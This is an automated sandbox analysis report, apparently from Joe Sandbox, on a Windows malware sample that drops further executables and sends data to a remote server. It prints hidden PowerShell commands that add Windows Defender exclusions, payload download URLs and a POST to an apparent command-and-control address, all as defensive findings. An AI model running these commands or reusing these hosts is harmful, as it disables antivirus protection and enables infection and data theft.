Windows Analysis Report
UBONg7lmVR.exe

Overview

General Information

Sample name:UBONg7lmVR.exe
renamed because original name is a hash value
Original sample name:e1653e127b026feeb94faf95ccc260c4b063e2e3bb4f1cc361a4f9d8e928ae6e.exe
Analysis ID:1499702
MD5:d2db9a159617250a517f9d074ab8f947
SHA1:cdc8efcd77ce4725200f29b9be43dac308a139a1
SHA256:e1653e127b026feeb94faf95ccc260c4b063e2e3bb4f1cc361a4f9d8e928ae6e
Tags:45-125-66-18exe

Detection

Score:75
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • UBONg7lmVR.exe (PID: 2924 cmdline: "C:\Users\user\Desktop\UBONg7lmVR.exe" MD5: D2DB9A159617250A517F9D074AB8F947)
    • tfi0ts5v.qpg.exe (PID: 320 cmdline: "C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe" MD5: A499C507987982C951093E21DF0C0D96)
      • powershell.exe (PID: 2752 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4816 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2000 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6208 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5492 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3116 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4768 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • rapnewsa.exe (PID: 6420 cmdline: C:\Reka\rapnewsa.exe MD5: 2D4E723C184D9403B078E53F2DE74A23)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe, ParentProcessId: 320, ParentProcessName: tfi0ts5v.qpg.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", ProcessId: 2752, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe, ParentProcessId: 320, ParentProcessName: tfi0ts5v.qpg.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", ProcessId: 2752, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: C:\Reka\rapnewsa.exeAvira: detection malicious, Label: HEUR/AGEN.1315917
Source: C:\Reka\rapnewsa.exeReversingLabs: Detection: 15%
Source: C:\Reka\rapnewsa.exeVirustotal: Detection: 24%
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeVirustotal: Detection: 8%
Source: UBONg7lmVR.exeVirustotal: Detection: 13%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Reka\rapnewsa.exeJoe Sandbox ML: detected
Source: C:\Reka\rapnewsa.exeCode function: 20_2_00231000 CryptUnprotectData,20_2_00231000
Source: C:\Reka\rapnewsa.exeCode function: 20_2_00231C40 CryptSignHashA,CryptUpdateProtectedState,WinHttpTimeFromSystemTime,20_2_00231C40
Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.216.214.209:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.125.66.18:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: UBONg7lmVR.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Reka\rapnewsa.exeCode function: 20_2_00238D40 FindFirstFileW,FindNextFileW,FindClose,20_2_00238D40
Source: global trafficHTTP traffic detected: GET /updated24/updated24/downloads/Updated11.12.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-4f05-aba3-c7f453357584/Updated11.12.exe?response-content-disposition=attachment%3B%20filename%3D%22Updated11.12.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBSRNVB4O&Signature=OlwE0Z7zZ9D5y5awFM9ze3uDdNQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDYfd%2BUjJB69jUrDiyn1ACmAHX7h00Ms9jdu77V8%2BbQiQIgZpc%2BMuqfuYdaGno1Dsx%2B7%2F1fwCn7flbDkj2a%2BGAQysgqpwIIFBAAGgw5ODQ1MjUxMDExNDYiDD4%2BkCpT2xQmd8KInCqEAvZwZorvFr4FTztBPDZNc9pDNqkH8vr7IuwfigaQALQGTrPZ0n7R7G8mqGRWhz4oaHR4A8Ys2xjzqZGWPRpx0BFDyTjkmyoax2AaGjEDU5jLO%2BI9eW7cP4cukvQKbCyWWaT5nH2nOvfjMtwrY7mMwVVTiar%2B39%2Byq5c%2B9nWv%2B%2FPilmtLMfv8xN8csgfCaXMfzMODVnTCTrFl761VH1766hS%2B5Cnh8uVySF0REGckmSLzCJ%2F0ZEYpa5suMbY8vBrSg7MNEaMobmU8RJEsTH84YYV9rPdjJvJZV5WyDYDN%2F9UJkRyE%2B75nvJfPzPEsxIOsO9LaiYwGWgye6WWMhiJmt%2FDDxtgtMIzctrYGOp0Bw0hHLf7CiJ1Ipvl%2FLmwUS8fG9wj2hiSRqVvcq7rKCQJfS2sjcFo0U551qCcKaGgnV0%2BuJkrF%2B5QqVA9lRII9%2B31TsHrG000N%2BnH3LKfIQS48cfIAiUtpWMew1%2FMMH%2Baw%2Fj57s8x1nLC7uDHr7YiJQqBA%2FwOszYvifoedrG%2BdmOMwGjA7Ud8zT1Ja0%2FZyvtW6%2BEBZTglVxH9fgZisGw%3D%3D&Expires=1724757268 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox ViewIP Address: 185.199.111.133 185.199.111.133
Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: POST /api/receiver/recv HTTP/1.1Connection: Keep-AliveContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48Content-Length: 3160Host: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /workhasf/kelm/main/yjsefceawd.json HTTP/1.1Host: raw.githubusercontent.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /workhasf/kelm/main/nepipirusas.json HTTP/1.1Host: raw.githubusercontent.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /workhasf/kelm/raw/main/iconozave.exe HTTP/1.1Host: github.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /workhasf/kelm/main/iconozave.exe HTTP/1.1Host: raw.githubusercontent.comUser-Agent: Go-http-client/1.1Referer: https://github.com/workhasf/kelm/raw/main/iconozave.exeAccept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /get HTTP/1.1Host: httpbin.orgUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global trafficDNS traffic detected: DNS query: bitbucket.org
Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: github.com
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: unknownHTTP traffic detected: POST /api/receiver/recv HTTP/1.1Connection: Keep-AliveContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48Content-Length: 3160Host: 45.125.66.18
Source: C:\Reka\rapnewsa.exeCode function: 20_2_00231470 NtQuerySystemInformation,OpenProcess,GetCurrentProcess,DuplicateHandle,GetFileType,CloseHandle,GetCurrentProcess,DuplicateHandle,CloseHandle,FindCloseChangeNotification,20_2_00231470
Source: C:\Reka\rapnewsa.exeCode function: 20_2_00233D50 NtClose,NtClose,20_2_00233D50
Source: C:\Reka\rapnewsa.exeCode function: 20_2_00231610 NtQueryObject,NtQueryObject,20_2_00231610
Source: Joe Sandbox ViewDropped File: C:\Reka\rapnewsa.exe 0A6BF0678BBD793E39A84DFB4C71D8B709D9E538288BF826C48B1BA899803BA4
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: Number of sections : 15 > 10
Source: UBONg7lmVR.exe, 00000000.00000000.2036590918.0000000003964000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameInstaller Driver.exeB vs UBONg7lmVR.exe
Source: UBONg7lmVR.exe, 00000000.00000002.4505274504.0000000003F9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs UBONg7lmVR.exe
Source: UBONg7lmVR.exeBinary or memory string: OriginalFilenameInstaller Driver.exeB vs UBONg7lmVR.exe
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: Section: /19 ZLIB complexity 0.9991581357758621
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: Section: /32 ZLIB complexity 0.9933081454918032
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: Section: /65 ZLIB complexity 0.9992535231210021
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: Section: /78 ZLIB complexity 0.9908877648782687
Source: classification engineClassification label: mal75.evad.winEXE@26/32@5/6
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeFile created: C:\Users\user\Desktop\new_example.txt
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5420:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2448:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3964:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1308:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3116:120:WilError_03
Source: C:\Reka\rapnewsa.exeMutant created: \Sessions\1\BaseNamedObjects\082e2202-17f7-4654-a651-ac9a3778e1d7
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03
Source: C:\Users\user\Desktop\UBONg7lmVR.exeFile created: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe
Source: UBONg7lmVR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: UBONg7lmVR.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Reka\rapnewsa.exeSystem information queried: HandleInformation
Source: C:\Users\user\Desktop\UBONg7lmVR.exeFile read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\UBONg7lmVR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: UBONg7lmVR.exeVirustotal: Detection: 13%
Source: unknownProcess created: C:\Users\user\Desktop\UBONg7lmVR.exe "C:\Users\user\Desktop\UBONg7lmVR.exe"
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess created: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe "C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Reka\rapnewsa.exe C:\Reka\rapnewsa.exe
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
